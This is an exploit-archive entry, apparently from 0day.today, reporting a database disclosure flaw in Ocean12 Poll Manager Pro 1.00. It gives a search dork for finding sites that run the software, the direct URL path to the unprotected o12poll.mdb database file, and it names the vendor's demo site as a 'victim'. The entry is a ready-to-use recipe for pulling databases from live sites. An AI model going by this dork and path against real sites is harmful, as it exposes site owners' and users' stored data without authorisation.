id: 4272
date: 11/27/2008
title: Ocean12 Poll Manager Pro Database Disclosure Vulnerability
author: Pouya_Server
cves: 

==========================================================
Ocean12 Poll Manager Pro Database Disclosure Vulnerability
==========================================================


#########################################################
---------------------------------------------------------
Portal Name: Ocean12 Poll Manager Pro
Version: 1.00
Vendor : http://ocean12tech.com/products/poll
Dork: Maintained with the Ocean12 Poll Manager Pro v1.00
Vulnerability : Database Disclosure Vulnerability
---------------------------------------------------------
#########################################################
http://site.com/path/o12poll.mdb

---------------------------------
Victem :
http://ocean12tech.com/products/poll/demo



#  0day.today [2023-03-25]  #